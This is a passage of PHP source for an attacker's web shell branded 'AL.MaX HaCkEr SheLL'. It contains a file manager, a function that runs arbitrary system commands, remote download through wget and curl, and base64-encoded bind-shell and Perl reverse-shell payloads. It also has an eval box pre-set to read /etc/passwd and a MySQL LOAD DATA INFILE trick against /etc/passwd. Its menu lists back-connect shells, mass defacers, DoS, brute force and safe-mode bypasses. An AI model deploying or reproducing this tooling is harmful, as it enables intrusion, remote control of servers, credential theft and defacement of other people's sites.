- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
- </form>
- </td>
- <td>DIR</td>
- <td style=\"text-align:center;\">".$owner."</td>
- <td><center>
- <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
- </form>
- </center></td>
- <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
- <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
- | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a>
- </td>
- </tr>";
- }
- }
- foreach($fname as $file)
- {
- $full = $pwd.$file;
- if(!$win && $posix)
- {
- $name=@posix_getpwuid(@fileowner($file));
- $group=@posix_getgrgid(@filegroup($file));
- $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
- }
- else { $owner = $user; }
- $buff .= "<tr>
- <td>
- <a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAXVJREFUOE+NkjtPwlAYhv0DLEZJSDQawQCTcYD/YWIkzqx0cHT1D7C4nMRFSdOWi4uzm9FFXcRBI3KxQGlLoYCAILyekhiRw6UneZKmeb8n79eepaW/43e5XFGfz0csvF4v8Xi2yfrGJllecRIa2xnLMo+OcDis6kYNulEfUdEMZD/KuH1IQ7y6RiQS0eZJAolkig6U/pHJy0i/vOPm/gnlikYl3ExJMJm6hFxWGQpFhUqyKJQqyNFGHMfptMnu5A5UkBrVZqkiLyt4zcrI5It4y8nY2w9ZkrVxSdBaoVozZ6LqtVGDu8dnHB2fgA4HGYHZaGE2TRj1BoqKhlNyxgriiSRan+2FmM0WYrzACiQq6HS7C2l3uhDjiSkC+vKr17OFNE0gSnH0+9+2sLLMRxRECYPBwBaCOEXACyKGw6EteEFiGgTOYzzsnguapSsExu+B4yB0qJYUlf5rcy5WxsrSYcfkdfavOp3RLbebzMPK0EH/7/APv59j7X+gJNIAAAAASUVORK5CYII%3D' /> $file</a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
- </form>
- </td>
- <td>".ukuran($full)."</td>
- <td style=\"text-align:center;\">".$owner."</td>
- <td><center>
- <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
- <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
- <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
- <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
- <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
- onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
- </form></center></td>
- <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
- <td>
- <a href=\"?y=$pwd&edit=$full\">edit</a>
- | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
- | <a href=\"?y=$pwd&delete=$full\">delete</a>
- | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gz</a>)
- </td>
- </tr>";
- }
- $buff .= "</table>"; return $buff;
- }
- function ukuran($file)
- {
- if($size = @filesize($file))
- {
- if($size <= 1024) return $size;
- else
- {
- if($size <= 1024*1024)
- { $size = @round($size / 1024,2);; return "$size kb"; }
- else { $size = @round($size / 1024 / 1024,2); return "$size mb"; }
- }
- }
- else return "???";
- }
- function exe($cmd)
- {
- if(function_exists('system'))
- {
- @ob_start();
- @system($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('exec'))
- {
- @exec($cmd,$results);
- $buff = "";
- foreach($results as $result)
- { $buff .= $result; }
- return $buff;
- }
- elseif(function_exists('passthru'))
- {
- @ob_start();
- @passthru($cmd);
- $buff = @ob_get_contents();
- @ob_end_clean();
- return $buff;
- }
- elseif(function_exists('shell_exec'))
- {
- $buff = @shell_exec($cmd);
- return $buff;
- }
- }
- function tulis($file,$text)
- {
- $textz = gzinflate(base64_decode($text));
- if($filez = @fopen($file,"w"))
- {
- @fputs($filez,$textz);
- @fclose($file);
- }
- }
- function tulis_2($file,$text)
- {
- $textz = base64_decode($text);
- if($filez = @fopen($file,"w"))
- {
- @fputs($filez,$textz);
- @fclose($file);
- }
- }
- function ambil($link,$file)
- {
- if($fp = @fopen($link,"r"))
- {
- while(!feof($fp))
- {
- $cont.= @fread($fp,1024);
- }
- @fclose($fp);
- $fp2 = @fopen($file,"w");
- @fwrite($fp2,$cont);
- @fclose($fp2);
- }
- }
- function which($pr)
- {
- $path = exe("which $pr");
- if(!empty($path))
- { return trim($path); }
- else { return trim($pr); }
- }
- function download($cmd,$url)
- {
- $namafile = basename($url);
- switch($cmd)
- {
- case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break;
- case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break;
- case 'wfread' : ambil($wurl,$namafile);break;
- case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
- case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
- case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
- case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
- default: break; }
- return $namafile;
- }
- function get_perms($file)
- {
- if($mode=@fileperms($file))
- {
- $perms='';
- $perms .= ($mode & 00400) ? 'r' : '-';
- $perms .= ($mode & 00200) ? 'w' : '-';
- $perms .= ($mode & 00100) ? 'x' : '-';
- $perms .= ($mode & 00040) ? 'r' : '-';
- $perms .= ($mode & 00020) ? 'w' : '-';
- $perms .= ($mode & 00010) ? 'x' : '-';
- $perms .= ($mode & 00004) ? 'r' : '-';
- $perms .= ($mode & 00002) ? 'w' : '-';
- $perms .= ($mode & 00001) ? 'x' : '-';
- return $perms;
- }
- else return "??????????";
- }
- function clearspace($text){ return str_replace(" ","_",$text); }
- $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
- $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
- $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
- jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
- ?>
- <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
- <head>
- <link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAMIOAADCDgAAAAAAAAAAAAAMDg7/FBMS/xgWFf8UFBT/FxcY/x8dHv8aGRn/GhgY/xoZGP8RFBT/DRAR/xMTEv8WFBP/FRQU/w0NDv8SERH/EBER/xYVFP8bGBf/GhgX/xoZGP8fHh3/FhcY/xYXF/8bGhn/ERMT/xESEv8TEhH/Hxwb/yMhIP8MCwv/EhER/xMTFP8ZGBj/GxkY/xgYF/8bGxn/HBoY/xIUFP8NERP/FBYX/xATEf8UFRP/ExMR/yooJv8kJCP/EREQ/w8ODf8VFBT/GxkY/xwaGf8YGBb/FxgW/xcYE/8RExD/DA8L/xATAf8TFQ3/EREN/xEQDf83NTL/Li0s/w0ODv8MDAz/FRUU/xUVFf8aGRj/HBsZ/xsbF/8WGRT/ExcJ/wwOEf8PDW7/BAYK/xESCf9RUEz/U1JQ/x8eHf8NDAz/Dg8P/xMUFP8QEhP/FxgY/xsbGP8aGxf/HB0S/xITBP8wLIH/enXa/2dpaf97e3D/ZGVi/xwdGv8MDAr/EREQ/xEREf8WFxf/Gxsa/xkaGf8bGxj/HBwW/xcZC/8eHWP/j4rc/z08P/8hIQb/ExUF/wQGAP8AAAD/ERAN/xERD/8REhH/FRYW/xoaGv8ZGhn/GBkX/xocFf8KDAH/VlGw/3h1zP8AAAH/AAQA/wwNLf8OC1f/RkY6/w4PDP8RERD/EhIR/xETE/8UFhb/ERIR/xESEP8bHBT/AwYD/1ZTlP+IhNf/AAAD/wAAZP8AABT/uLX//4SEeP8AAAD/FRUT/xEREf8TFBT/FhYW/zM0M/8lJiT/BAYC/wIEAP8NDSH/wcDN/0lFrv9QS+r/v7zz/8/O2/8BAwD/DQ4K/xISEf8QERD/DxER/wYICP8JDQ7/RkZF/
- 1VVUv8xMir/AAAA/1VWUf//////qqnQ/2Zoaf8GCAv/AgYA/xESD/8UFBP/ExMT/xobG/85Ozv/PD4+/zQ1Nf9SUlH/f357/6Sknv+Hh3//AAAO/wAAHv8AAwD/Cw0E/w8RDf8QEhD/FRUV/xYVFf8MDw//FxYW/yspKP84OTn/SUpJ/2VkYv/Ozcr/r66i/wAAJv8VFzX/Cw4B/xUVEv8ZFxT/FBQT/xMVFf8XFxf/DhAR/yclJf85Njb/RkZF/2BgYf9/fX3/ZGRi/xsaE/8TEiL/ExQ5/wwQB/8YFxT/GxgW/xYVFP8TExT/FxYX/xAREf8eHRz/KCUk/yUjIv8aGhn/DQ0M/wAAAP8JCwr/FxcV/xATFf8TFRL/GhkW/xwZF/8YFxb/FBMT/xQUE/8RERH/ExIS/xEPDv8MDQz/EhEQ/xUVE/8PERP/Cg0Q/xIUFP8RFBL/FhYV/xwaGf8aFxb/ExMT/xISEv8QDw//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D%3D" type="image/x-icon" />
- <title>Private ! .. AL.MaX HaCkEr SheLL</title>
- <script type="text/javascript">
- function tukar(lama,baru)
- {
- document.getElementById(lama).style.display = 'none';
- document.getElementById(baru).style.display = 'block';
- }
- </script>
- <style type="text/css">
- AKUSTYLE { display:none; }
- body { background:#000000; }
- A:link {COLOR: #FF5A00; TEXT-DECORATION: none }
- A:visited {COLOR: #FC5000; TEXT-DECORATION: none }
- A:hover {text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan; color: #FF6600; TEXT-DECORATION: none }
- A:active {color: Red; TEXT-DECORATION: none }
- textarea {BORDER-RIGHT: #3e3e3e 1px solid; BORDER-TOP: #3e3e3e 1px solid; BORDER-LEFT: #3e3e3e 1px solid; BORDER-BOTTOM: #3e3e3e 1px solid; BACKGROUND-COLOR: #1b1b1b; font: Fixedsys bold; color: #aaa; }
- * { font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
- #menu { background:#040404; margin:2px 2px 2px 2px; }
- #menu a { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
- #menu a:hover { background:#000000; border-bottom:1px solid #000000; border-top:1px solid #000000; }
- .tabnet { margin:15px auto 0 auto; border: 1px solid #000000; }
- .main { width:100%; }
- .gaya { color: #FF5E00; }
- .your_ip { color: #FF5E00; }
- .inputz { background:#000000; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
- .inputzbut { background:#111111; color:#060606; margin:0 4px; border:1px solid #000000; }
- .inputz:hover,
- .inputzbut:hover { border-bottom:1px solid #FF4D00; border-top:1px solid #FF4400; color:#FF4400; }
- .output { margin:auto; border:1px solid #FF0000; width:100%; height:400px; background:#000000; padding:0 2px; }
- .cmdbox { width:100%; }
- .head_info { padding: 0 4px; }
- .b1 { font-size:30px; padding:0; color:#FF5100; }
- .b2 { font-size:30px; padding:0; color: #FF5500; }
- .b_tbl { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
- .phpinfo table { width:100%; padding:0 0 0 0; }
- .phpinfo td { background:#111111; color:#FF5500; padding:6px 8px;; }
- .phpinfo th, th { background:#444444; border-bottom:1px solid #000000; font-weight:normal; }
- .phpinfo h2,
- .phpinfo h2 a { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#444444; padding:4px 0; }
- .explore { width:100%; }
- .explore a { text-decoration:none; }
- .explore td { border-bottom:1px solid #444444; padding:0 8px; line-height:24px; }
- .explore th { padding:3px 8px; font-weight:normal; }
- .explore th:hover,
- .phpinfo th:hover { border-bottom:1px solid #FF4400; }
- .explore tr:hover { background:#050505; }
- .viewfile { background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
- .sembunyi { display:none; padding:0;margin:0; }
- .style1 {
- text-align: center;
- }
- </style>
- </head>
- <body onLoad="document.getElementById('cmd').focus();">
- </div>
- <div class="style39">
- <!-- head info start here -->
- <div class="head_info">
- <table>
- <tr>
- <td>
- <table class="b_tbl">
- <tr>
- <td class="style43">
- <img class="decoded" alt="http://oi50.tinypic.com/117hic1.jpg" src="http://oi50.tinypic.com/117hic1.jpg" width="165" height="165"><br>
- <span <ul>
- <span style="font-family: trebuchet ms,helvetica,sans-serif;">
- <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);">
- <span class="style6">
- <span class="style8"> <strong class="style33">AttaCker</strong></span><span class="style4"><strong>
- </strong> </span>
- <span class="style9"> <strong class="style33">From</strong></span><span class="style4">
- </span></span>
- </font></span></span><strong>
- <font style="text-shadow: 2px 2px 3px rgb(0, 0, 0);">
- <span style="font-family: trebuchet ms,helvetica,sans-serif;">
- <span <ul class="style33">
- SuDaN</span></span></font></strong><span class="style4"><span class="style6"><font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);"><span <ul style="font-family: 'trebuchet ms', helvetica, sans-serif"><strong><br>
- <font size="6"><span lang="en-us" class="style49">
- <span class="style31">
- <a href="mailto:pv0@HoTmaiL.CoM">
- Gun</a></span></span></font></strong><font size="6"><span lang="en-us" class="style49"><font color="#FF0000"><a href="mailto:gun@linuxmail.org"><span class="style32"><strong class="style31">@</strong></span></a></font><a href="mailto:Gun@linuxmail.org"><strong class="style31">Linuxmail.org</strong></a></span></font></span></font></span></span></td>
- </tr>
- </table>
- </td>
- <td class="style38">
- <?php echo $buff; ?>
- </td>
- </tr>
- </table>
- </div>
- <!-- head info end here -->
- <!-- menu start -->
- <div id="menu">
- <center>
- <a href="?<?php echo "y=".$pwd; ?>"> <b>Explore</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=shell"> <b>Shell</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=php"> <b>Eval</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=mysql"> <b>MySQL</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo"> <b>PHP</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=netsploit"> <b>NetSploit</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=upload"> <b>Upload</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=mail"> <b>Mail</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=brute"> <b>BruteForce</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=readable"> <b>OpenDIR</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=dos"> <b>D0S</b></a><br><br>
- <a href="?<?php echo "y=".$pwd; ?>&x=localdomain"> <b>
- LocalDomain</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=zone-h"> <b>Zone-H</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=symlink"> <b>Symlink</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=identify"> <b>Domain
- Script</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=sqli-scanner"> <b>
- SQLI Scan</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=web-info"> <b>
- Website Whois</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=port-scanner"> <b>
- Port-Scanner</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=wp-reset"> <b>WP
- Reset</b></a><br><br>
- <a href="?<?php echo "y=".$pwd; ?>&x=jm-reset"> <b>Jomlaa
- Reset</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=cms-scanner"> <b>CMS
- Scanner</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=vb"> <b>VB Changer</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=string-encode"> <b>
- String Encoder</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=mysqlbackup"> <b>SQL
- Backup</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=whmcs"> <b>WHMCS
- Decoder</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=security-mode"> <b>
- Security Mode</b></a>
- <a href="?<?php echo "y=".$pwd; ?>&x=process"> <b>Process</b></a>
- <br>
- <br>
- <a href="?BackConnect=PHP_6"> <b>Cgi Shell</b></a>
- <a href="?BackConnect=PHP_7"> <b>Python Shell</b></a>
- <a href="?BackConnect=PHP_9"> <b>perl Bypass Tools</b></a>
- <a href="?BackConnect=PHP_10"> <b>Auto Root</b></a>
- <a href="?BackConnect=PHP_15"> <b>ShowsourceRead</b></a>
- <a href="?BackConnect=PHP_11"> <b>Cgi Shell Priv pass=dz</b></a>
- <a href="?BackConnect=PHP_20"> <b>SuExecByps</b></a>
- <a href="?BackConnect=PHP_16"> <b>Config Shell</b></a>
- <br>
- <br>
- <a href="?BackConnect=PHP_18"> <b>LitespeedBypas</b></a>
- <a href="?BackConnect=PHP_19"> <b>SsiBypass</b></a>
- <a href="?BackConnect=PHP_24"> <b>Php Eval Bypass</b></a>
- <a href="?BackConnect=PHP_25"> <b>Php4 Bind 8888 Eval</b></a>
- <a href="?BackConnect=PHP_27"> <b>Safe Mode php.ini</b></a>
- <a href="?BackConnect=PHP_28"> <b>Mini Cgi</b></a>
- <a href="?BackConnect=PHP_29"> <b>izo ozel ssi shell</b></a>
- <a href="?BackConnect=PHP_30"> <b>Php3.0 Priv8 Bypass</b></a>
- <br>
- <br>
- <a href="?BackConnect=PHP_4"> <b>Dc Backconnect</b></a>
- <a href="?BackConnect=PHP_1"> <b>Php Backconnect 1</b></a>
- <a href="?BackConnect=PHP_2"> <b>Php Backconnect 2</b></a>
- <a href="?BackConnect=PHP_3"> <b>Php Backconnect 3</b></a>
- <a href="?BackConnect=PHP_13"> <b>Php Backconnect 4</b></a>
- <a href="?BackConnect=PHP_21"> <b>Perlsocket</b></a>
- <a href="?BackConnect=PHP_5"> <b>Python Bacconnect</b></a>
- <br>
- <br>
- <a href="?BackConnect=PHP_17"> <b>Python izo</b></a>
- <a href="?BackConnect=PHP_12"> <b>Metasploit Bacconnect</b></a>
- <a href="?BackConnect=PHP_26"> <b>Mass deface</b></a>
- <a href="?BackConnect=PHP_23"> <b>WHMCS Server</b></a>
- <a href="?BackConnect=PHP_77"> <b>Wordpress Mass Defacer</b></a>
- <a href="?BackConnect=PHP_78"> <b>WordPress Admin</b></a>
- <a href="?logout=1"> <b>Logout</b></a>
- </center>
- </div>
- <!-- menu end -->
- <?php
- if(isset($_GET['x']) && ($_GET['x'] == 'php'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=php" method="post">
- <table class="cmdbox">
- <tr>
- <td>
- <textarea class="output" name="cmd" id="cmd"><?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');";?></textarea>
- </td>
- </tr>
- <tr>
- <td>
- <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
- </td>
- </tr>
- </table>
- </form>
- <?php
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
- {
- if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
- {
- $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
- if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
- {
- $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
- $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
- $msg .= " <span class=\"gaya\">-></span> <a href=\"?y=".$pwd."&x=mysql&
- sqlhost=".$sqlhost."&sqluser=".$sqluser."&
- sqlpass=".$sqlpass."&
- sqlport=".$sqlport."&\">[ databases ]</a>";
- if(isset($_GET['db']))
- $msg .= " <span class=\"gaya\">-></span>
- <a href=\"y=".$pwd."&x=mysql&
- sqlhost=".$sqlhost."&sqluser=".$sqluser."&
- sqlpass=".$sqlpass."&
- sqlport=".$sqlport."&
- db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
- if(isset($_GET['table']))
- $msg .= " <span class=\"gaya\">->
- </span>
- <a href=\"y=".$pwd."&x=mysql&
- sqlhost=".$sqlhost."&sqluser=".$sqluser."&
- sqlpass=".$sqlpass."&sqlport=".$sqlport."&
- db=".$_GET['db']."&
- table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
- $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
- $msg .= "</div>";
- echo $msg;
- if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
- {
- $db = $_GET['db'];
- $query = "DROP TABLE IF EXISTS AL.MaX HaCkEr0_table;
- \nCREATE TABLE `AL.MaX HaCkEr0_table` ( `file` LONGBLOB NOT NULL );
- \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM AL.MaX HaCkEr0_table;
- \nDROP TABLE IF EXISTS AL.MaX HaCkEr0_table;";
- $msg = "<div style=\"width:99%;padding:0 10px;\">
- <form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
- <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
- </form>
- </div> ";
- $tables = array();
- $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
- $hasil = @mysql_list_tables($db,$con);
- while(list($table) = @mysql_fetch_row($hasil))
- { @array_push($tables,$table); }
- @sort($tables);
- foreach($tables as $table)
- {
- $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>";
- }
- $msg .= "</table>";
- }
- elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
- {
- $db = $_GET['db'];
- $table = $_GET['table'];
- $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
- $msgq = "<div style=\"width:99%;padding:0 10px;\">
- <form action=\"?\" method=\"get\">
- <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
- <input type=\"hidden\" name=\"x\" value=\"mysql\" />
- <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
- <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
- <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
- <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
- <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
- <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
- <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
